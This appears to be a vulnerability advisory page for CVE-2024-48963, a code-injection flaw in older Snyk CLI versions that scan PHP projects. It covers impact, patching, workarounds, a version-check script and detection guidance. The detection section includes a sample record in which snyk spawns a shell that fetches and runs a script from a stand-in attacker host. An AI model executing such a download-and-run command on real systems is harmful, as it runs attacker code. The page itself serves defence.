CVE-2024-48963

7.5 HIGH

📋 TL;DR

Snyk CLI versions before 1.1294.0 are vulnerable to code injection when scanning untrusted PHP projects. An attacker who gets a victim to run snyk test inside a malicious project directory can execute arbitrary code with that user's privileges. This affects developers, security teams and CI pipelines that use Snyk CLI to analyse PHP projects.

💻 Affected Systems

Products:
  • Snyk CLI
Versions: All versions before 1.1294.0
Operating Systems: All platforms running Snyk CLI
Default Config Vulnerable: ⚠️ Yes
Notes: Only the PHP project scanning path (snyk-php-plugin, fixed in plugin release 1.10.0 and shipped in CLI 1.1294.0) is affected. Exploitation requires running snyk test within an untrusted project directory.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Arbitrary code execution with the privileges of the user running Snyk CLI. On a developer workstation or CI runner that user typically holds source code, SSH keys, cloud and package-registry credentials and the SNYK_TOKEN, so the realistic worst case is credential theft, tampering with the build or its artifacts, or lateral movement from that host.

🟠 Likely Case

Arbitrary code execution in the context of the user running Snyk (not a privilege escalation: the attacker gets exactly what that user has), used to steal credentials, modify files, or install malware.

🟢 If Mitigated

No impact if only trusted projects are scanned or a patched version (1.1294.0 or later) is used.

🌐 Internet-Facing: LOW - The Snyk CLI is not a network service; exposure comes from untrusted code pulled in from the internet and scanned locally, which still requires the victim to run the scan.
🏢 Internal Only: MEDIUM - Developers and CI pipelines scanning untrusted repositories, forks or third-party dependencies can be exploited, and CI runners often hold deployment credentials.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No
Complexity: LOW

Exploitation requires user interaction (a person, or a CI pipeline, running snyk test inside the attacker-controlled project) and the ability to shape that project's contents, including its directory names. No authentication is involved: the attacker only needs the victim to obtain the malicious project, for example by cloning a repository or pulling in a third-party dependency.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1294.0

Vendor Advisory: https://github.com/snyk/snyk-php-plugin/releases/tag/v1.10.0

Restart Required: No

Instructions:

1. Update the Snyk CLI. If it was installed through npm: npm update -g snyk (or npm install -g snyk@latest). If it was installed another way (standalone binary, Homebrew, a CI or Docker image), update through that channel; every copy on every workstation and runner has to be updated separately.
2. Verify the version: snyk --version
3. Confirm the reported version is 1.1294.0 or higher.

🔧 Temporary Workarounds

Avoid scanning untrusted projects (platform: all)

Only run snyk test on PHP projects you trust, as the vendor recommends. Treat anything freshly cloned from a third party, including pull requests from forks, as untrusted until it has been reviewed.

Sandbox the scanning environment (platform: linux)

Run the Snyk CLI in a throwaway container or VM when scanning third-party code, mounting the project read-only and passing only the credentials the scan needs:

docker run --rm -e SNYK_TOKEN -v "$(pwd):/app:ro" -w /app snyk/snyk-cli test

The image name and the trailing test argument are carried over from the command as originally given on this page; use whichever official image and tag you actually run. Know the limits of this workaround: the CLI inside the container still executes the vulnerable code path unless the image itself ships 1.1294.0 or later, and anything that code does can read the mounted project and the SNYK_TOKEN you passed in. Do not mount your home directory, credential directories or the Docker socket into that container.

🧯 If You Can't Patch

  • Limit who may run Snyk CLI against external or third-party code, and keep it off hosts that hold production credentials
  • Require a review of an external project's contents before it is scanned, and run such scans only on ephemeral, minimally privileged CI runners

🔍 How to Verify

Check Version:

snyk --version

Check if Vulnerable:

If the reported version is below 1.1294.0, that installation is vulnerable. Check every installation separately: a developer workstation, a CI runner and a scanning container each carry their own copy, and command -v snyk shows which binary a given shell or pipeline will actually run.

Verify Fix Applied:

Run snyk --version again after updating and confirm it reports 1.1294.0 or higher.
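The version check above is easy to get wrong when scripted across a fleet, because a string comparison ranks "1.999.0" above "1.1294.0". The script below is an added example for this page, not Snyk's code and not part of the advisory; it compares the three numeric components against the fixed release and, if a snyk binary is on PATH, reports on the installed copy. It assumes snyk --version prints MAJOR.MINOR.PATCH, possibly followed by a suffix such as " (standalone)"; the helper names are this example's own.

```shell
#!/bin/sh
# Added example for this page; not Snyk's code and not from the advisory.
# Decide whether a Snyk CLI version string is below the fixed release
# 1.1294.0 with a numeric, component-by-component comparison.
# Assumption: `snyk --version` prints "MAJOR.MINOR.PATCH", possibly followed
# by a suffix such as " (standalone)".

FIXED_MAJOR=1
FIXED_MINOR=1294
FIXED_PATCH=0

# version_is_vulnerable VERSION
#   returns 0 if VERSION < 1.1294.0 (vulnerable), 1 if fixed, 2 if unparseable
version_is_vulnerable() {
    # Extract the three numeric components; tolerate a "v" prefix or trailing text.
    parsed=$(printf '%s' "$1" | sed -n \
        's/^[^0-9]*\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2 \3/p')
    [ -n "$parsed" ] || return 2
    set -- $parsed                       # $1=major $2=minor $3=patch
    [ "$1" -lt "$FIXED_MAJOR" ] && return 0
    [ "$1" -gt "$FIXED_MAJOR" ] && return 1
    [ "$2" -lt "$FIXED_MINOR" ] && return 0
    [ "$2" -gt "$FIXED_MINOR" ] && return 1
    [ "$3" -lt "$FIXED_PATCH" ]
}

# check_installed_snyk: query the binary that is actually on PATH (the one a
# pipeline would run) and report; same return codes as version_is_vulnerable.
check_installed_snyk() {
    if ! command -v snyk >/dev/null 2>&1; then
        echo "snyk not found on PATH"
        return 2
    fi
    v=$(snyk --version 2>/dev/null)
    version_is_vulnerable "$v"
    case $? in
        0) echo "VULNERABLE: snyk $v is below 1.1294.0"; return 0 ;;
        1) echo "OK: snyk $v is 1.1294.0 or later"; return 1 ;;
        *) echo "Could not parse version output: $v"; return 2 ;;
    esac
}

check_installed_snyk || true
```

Run it on each host or in each CI image; a status line of VULNERABLE means that copy needs the update from the Official Fix section.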

📡 Detection & Monitoring

Log Indicators:

  • Child processes spawned by the Snyk CLI process during a PHP scan (a shell, curl or wget, php, or any other interpreter). A PHP dependency scan should not normally need to start such helpers, so a snyk → sh or snyk → curl parent/child relationship in EDR or auditd process-creation events is the most direct indicator.
  • snyk test runs against freshly cloned or otherwise untrusted directories, especially on CI runners.

Network Indicators:

  • Outbound connections from the Snyk process, or from its child processes, to destinations other than the Snyk API endpoint configured for your organisation.

SIEM Query (ECS-style field names, as in the original query; tune the allowlist of expected child processes to what your own scans spawn):

process.parent.name:snyk AND NOT process.name:(git OR node)

To scope the hunt, first enumerate the scans themselves with process.name:snyk AND process.args:test, then pivot to their children.
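The same parent/child logic as a runnable filter over exported process-creation records, so the idea can be tested before it is turned into a SIEM rule. This is an added example for this page, not Snyk's code and not from the advisory. The record format (timestamp, parent name, child name, command line) and the sample lines are constructed for the example, and the allowlist of expected children (git only) is an assumption to tune against what your own scans actually spawn.

```shell
#!/bin/sh
# Added example for this page; not Snyk's code and not from the advisory.
# Hunt for child processes spawned by the Snyk CLI that a PHP dependency scan
# should not need to start.  Input is a constructed, simplified process-
# creation record per line, as an EDR export might provide:
#   <timestamp> <parent_process_name> <child_process_name> <child_command_line>
# Assumption to tune: the only helper a PHP `snyk test` is expected to spawn
# here is git; anything else (sh, curl, php, ...) is flagged.

ALLOWED_CHILDREN="git"

# flag_snyk_children: read records on stdin, print an ALERT line for each
# child of snyk that is not on the allowlist; return 0 if anything was
# flagged, 1 otherwise.
flag_snyk_children() {
    flagged=1
    while IFS=' ' read -r ts parent child cmdline; do
        [ "$parent" = "snyk" ] || continue
        allowed=1
        for a in $ALLOWED_CHILDREN; do
            [ "$child" = "$a" ] && allowed=0
        done
        [ "$allowed" -eq 0 ] && continue
        printf 'ALERT %s snyk spawned %s: %s\n' "$ts" "$child" "$cmdline"
        flagged=0
    done
    return $flagged
}

# count_alerts RECORDS: run the detector over a record set and print how many
# alerts fired (grep -c exits 1 when the count is zero).
count_alerts() {
    printf '%s\n' "$1" | flag_snyk_children | grep -c '^ALERT'
}

# Constructed sample: one benign helper, one injected download-and-run, and
# one unrelated process whose parent is not snyk.
SAMPLE_RECORDS='2024-11-01T10:00:01Z snyk git remote get-url origin
2024-11-01T10:00:02Z snyk sh -c curl -s http://attacker.example/p.sh | sh
2024-11-01T10:00:03Z bash php -v'

if printf '%s\n' "$SAMPLE_RECORDS" | flag_snyk_children; then
    echo "review the alerts above"
fi
```

Only the second record is flagged: the git child is allowlisted and the php process was started by bash, not by snyk. Feed real exports in the same column order, or adapt the read line to your tool's format.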

🔗 References
